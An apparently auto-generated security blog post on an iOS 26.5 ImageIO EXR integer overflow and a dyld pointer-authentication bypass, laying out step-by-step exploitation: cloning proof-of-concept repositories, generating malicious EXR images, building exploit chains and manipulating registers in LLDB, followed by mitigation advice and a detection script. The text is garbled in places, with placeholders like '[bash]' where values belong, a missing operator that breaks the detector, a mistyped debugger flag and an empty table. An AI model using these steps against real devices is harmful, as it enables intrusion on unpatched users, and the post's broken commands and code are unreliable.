IOS 265 Zero-Day Deep Dive: From EXR Image Crash To Register Control & PAC Bypass Exploitation + Video

Introduction:

In a recent disclosure, veteran iOS security researcher Alexandre Borges (@ale_sp_brazil) revealed a significant breakthrough: a reproducible crash in iOS 26.5 with clear register control, a well-defined exploitation primitive, and a confirmed Proof-of-Concept (PoC). While the researcher hints at a possible working exploit, the disclosure aligns with Apple’s May 2026 security update that patched multiple memory corruption vulnerabilities across iOS 26.5, iPadOS 26.5, macOS Tahoe 26.5, and other platforms. This article provides a comprehensive technical analysis of the vulnerability class, exploitation primitives, and a step-by-step guide for security researchers to understand, reproduce, and mitigate these iOS memory corruption flaws.

Learning Objectives:

Understand the mechanics of integer overflow and heap buffer overflow vulnerabilities in iOS’s ImageIO framework (CVE-2026-28990)
Learn to establish register control, read/write primitives, and develop reliable Proof-of-Concept exploits for iOS
Master iOS kernel debugging with LLDB, patch diffing techniques, and PAC bypass strategies using dyld chained fixup oracles

Understanding the Vulnerability: Integer Overflow in EXR Image Processing

The core vulnerability resides in the `EXRReadPlugin::decodeBlockAppleEXR` function within Apple’s ImageIO framework. Prior to iOS 26.5, an integer overflow occurs when calculating buffer sizes using the multiplication of an image’s `width` and `height` values. By supplying a specially crafted EXR image with dimensions that cause the multiplication to wrap around to zero, the function calls `malloc_type_malloc` with a tiny buffer size. Subsequently, writing excess pixel data triggers a heap overflow, corrupting adjacent memory and leading to a deterministic crash.

Technical Deep Dive:

The crash manifests with an exception guard (EXC_GUARD) and register corruption, as observed in the following LLDB backtrace:

thread 5, queue = 'com.apple.root.user-interactive-qos', stop reason = EXC_GUARD
frame 0: 0x00000001855ba8c8 libdispatch.dylib`_dispatch_root_queue_drain + 176
-> 0x1855ba8c8 <+176>: ldr x8, [x0, 0x10]!

Step-by-Step Exploitation Setup (Linux/macOS Environment):

Obtain the PoC: Clone the public repository containing the EXR ImageIO overflow exploit:
```
git clone https://github.com/Padawan986/Overflow-Bug.git
cd Overflow-Bug
```
Compile the PoC Payload Generator: The repository includes Python and Objective-C components for crafting malicious EXR files:
```
Generate malicious EXR image
python3 generate_exr_poc.py --width 65536 --height 65536 --output payload.exr
```
Deploy to Test Device: Use `libimobiledevice` or Xcode to transfer and trigger the payload on a vulnerable iOS device (versions < 26.5):
```
ideviceinstaller -i payload.exr
Trigger via Safari or any image-rendering application
```
Capture Crash Logs: On the iOS device, navigate to Settings > Privacy & Security > Analytics & Improvements > Analytics Data to retrieve the crash report. Alternatively, use `idevicesyslog` to monitor real-time崩溃 logs:
```
idevicesyslog | grep -i "EXC_GUARD|ImageIO"
```
Establishing Exploit Primitives: Register Control and Memory Corruption

According to Apple’s Security Research documentation, successful exploitation typically requires three fundamental levels of control: register control, read/write primitives, and control over program flow. In this vulnerability, the heap overflow allows an attacker to partially or fully control register values—as demonstrated by the crash log showing controlled values in registers like `x0` and x8.

Analyzing Register Control with LLDB:

Once you have a crash log, use LLDB to inspect the register state and determine the level of control achieved:

 Attach LLDB to the crashing process
lldb
(lldb) target create /path/to/crashed_app
(lldb) target modules add --symfile /path/to/crash_log.crash
(lldb) register read --all

Building a Read/Write Primitive:

With controlled register values, attackers can craft ROP (Return-Oriented Programming) chains to achieve arbitrary memory read/write. The following LLDB script demonstrates how to manipulate register values at runtime:

 LLDB Python script for register manipulation
import lldb

def set_register_value(debugger, command, result, internal_dict):
target = debugger.GetSelectedTarget()
process = target.GetProcess()
thread = process.GetSelectedThread()
frame = thread.GetSelectedFrame()

Override x0 with controlled value
reg_x0 = frame.FindRegister("x0")
reg_x0.SetValue(0x4141414141414141)  Controlled pattern
print("[+] Register x0 overwritten")

Register the command
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand('command script add -f register_control.set_register_value set_reg')

PAC Bypass and Advanced Exploitation: The dyld Signing Oracle

Modern iOS devices (arm64e) implement Pointer Authentication Codes (PAC) to mitigate ROP and JOP attacks. However, recent research (CVE-2026-20700) demonstrates that the dynamic linker (dyld) itself can be weaponized as a PAC signing oracle. By crafting a malicious Mach-O binary, an attacker can direct dyld to produce PAC-valid pointers into attacker-controlled slots through the chained fixup mechanism.

Step-by-Step PAC Bypass with dyld Oracle:

1. Clone the CVE-2026-20700 Repository:

git clone https://github.com/R3n3r0/CVE-2026-20700.git
cd CVE-2026-20700

2. Build the Exploit Pipeline:

 Full build with 99k symbols
make
 Fast iteration build
make SYMBOLS=10000

3. Generate Malformed Dylib:

 Generate the hand-crafted Mach-O dylib
python3 generators/gen_malformed_dylib.py

4. Trigger PAC-Signed Pointer Injection:

The exploit forces dyld to write a PAC-valid pointer into a `dispatch_source_t` timer handler, which is then called naturally through the event loop:

 Run the chain_close preset to execute the dispatch event loop
make chain_close

5. Verify the Exploit:

 Parse the LC_DYLD_CHAINED_FIXUPS header
make inspect
 Scan for writable pointer sections
make scan

Windows/Linux Alternative for Analysis:

For researchers on non-macOS platforms, use the `ipsw` tool to analyze iOS firmware and Mach-O binaries:

 Install ipsw (cross-platform)
pip3 install ipsw
 Download and parse iOS 26.5 firmware
ipsw download --device iPhone14,3 --version 26.5
ipsw extract ./iPhone14,3_26.5.ipsw
ipsw macho parse ./dyld_shared_cache_arm64e

Patch Diffing: Identifying the Fix in iOS 26.5

Apple addressed these vulnerabilities with improved bounds checking, input validation, and memory locking mechanisms across multiple components. Security researchers can perform patch diffing to understand the exact changes:

Using `radare2` for Binary Diffing:

 Extract dyld_shared_cache from iOS 26.4.2 and 26.5
r2 -A ./iOS_26.4.2/ImageIO
r2 -A ./iOS_26.5/ImageIO
 Compare functions
r2 -c "diff ./iOS_26.4.2/ImageIO ./iOS_26.5/ImageIO"

Key Patched Components in iOS 26.5:

|–||–|-|

5. Mitigation Strategies and Defensive Measures

For security teams and iOS administrators, the following mitigation strategies are critical:

Immediate Patching: Apply iOS 26.5, iPadOS 26.5, macOS Tahoe 26.5, and associated updates immediately. Apple released these updates on May 11, 2026.
Restrict Media Processing: Until patches are deployed, advise users to avoid opening media files (especially EXR, JPEG, and media containers) from untrusted sources.
Implement File Type Validation: Deploy file type validation controls at the network perimeter to block maliciously crafted image files.
Enable Exploit Protection: On macOS, enable System Integrity Protection (SIP) and Notarization. On iOS, ensure “Lockdown Mode” is enabled for high-risk users.

5. Monitor for Indicators of Compromise (IoCs):

Unexpected app crashes, especially in image-rendering applications
Crash logs showing `EXC_GUARD` or `EXC_BAD_ACCESS` with controlled register values
Unusual network traffic from media-processing daemons

Linux/Windows Detection Script:

 Python script to scan for malicious EXR files
import struct
import sys

def check_exr_overflow(filepath):
with open(filepath, 'rb') as f:
 Check EXR magic bytes
magic = f.read(4)
if magic != b'\x76\x2f\x31\x01':
return False

Parse header for width/height
f.seek(8)
width = struct.unpack('<I', f.read(4))[bash]
height = struct.unpack('<I', f.read(4))[bash]

Check for overflow-inducing dimensions
if (width  height) == 0 and width > 0 and height > 0:
print(f"[!] Potential malicious EXR: {filepath} (width={width}, height={height})")
return True
return False

if <strong>name</strong> == "<strong>main</strong>":
for arg in sys.argv[1:]:
check_exr_overflow(arg)

6. iOS Kernel Debugging and Exploit Development Workflow

For researchers building upon these primitives, the following workflow is recommended:

Setting Up a Debugging Environment (Corellium or Physical Device):

1. Enable Developer Mode on iOS:

Settings > Privacy & Security > Developer Mode > Enable

2. Attach LLDB to a Running Process:

 Find process PID
idevicesyslog | grep "ImageIO"
 Attach LLDB
lldb
(lldb) platform select remote-ios
(lldb) process connect connect://[bash]:1234
(lldb) process attach --pid [bash]

3. Set Conditional Breakpoints:

(lldb) breakpoint set --1ame EXRReadPlugin::decodeBlockAppleEXR
(lldb) breakpoint command add
Enter your Python command: print("Breakpoint hit at EXR decode")
(lldb) continue

4. Dump Kernel Memory:

 Using ipsw for kernel analysis
ipsw kernel dump ./kernelcache.release.iPhone14,3

What Undercode Say:

Key Takeaway 1: The iOS 26.5 EXR ImageIO integer overflow (CVE-2026-28990) provides a reliable heap overflow with deterministic register control, making it a prime candidate for full exploit chain development.
Key Takeaway 2: The combination of memory corruption primitives with PAC bypass techniques (CVE-2026-20700) demonstrates that even modern hardware defenses can be subverted through creative exploitation of trusted system components like dyld.

Analysis:

The disclosure by Alexandre Borges highlights a critical trend in iOS security research: the convergence of traditional memory corruption vulnerabilities with sophisticated bypass techniques for modern mitigations. While Apple’s rapid patching of iOS 26.5 addresses the immediate threat, the existence of public PoCs and the demonstrated register control primitive significantly lowers the barrier for attackers to develop reliable exploits. The EXR overflow is particularly concerning because it can be triggered remotely via Safari or iMessage, requiring only a malicious image file. Organizations must prioritize patching and implement strict media file controls. Furthermore, the dyld PAC oracle technique reveals that pointer authentication, while effective against naive ROP, is not a silver bullet—system components with elevated privileges remain attractive targets. Security researchers should focus on understanding these primitive-building techniques to develop more robust mitigations and detection mechanisms.

Prediction:

+1 The public disclosure of these vulnerabilities will accelerate iOS security research, leading to improved fuzzing frameworks and automated exploit generation tools for the ImageIO attack surface.
-1 Nation-state actors and commercial spyware vendors will rapidly weaponize the EXR overflow PoC, integrating it into zero-click exploit chains targeting journalists, activists, and political figures, similar to previous Operation Triangulation campaigns.
+1 Apple’s security team will respond with enhanced input validation and memory safety measures in iOS 27, potentially adopting more aggressive sandboxing for image-processing daemons.
-1 The dyld PAC oracle technique will inspire a new wave of research into trusted system component abuse, potentially leading to a class of “trusted oracle” vulnerabilities that bypass hardware-based security controls.
+1 The security community will develop open-source detection tools and YARA rules to identify malicious EXR files, improving defensive capabilities for enterprise iOS deployments.
-1 Users on older iOS versions (prior to 26.5) remain vulnerable and face increased risk of targeted attacks, as patch adoption rates for iOS updates typically lag behind release dates.

▶️ Related Video (76% Match):

https://www.youtube.com/watch?v=b2AgibUg47k

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Aleborges Ios – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Listen to this Post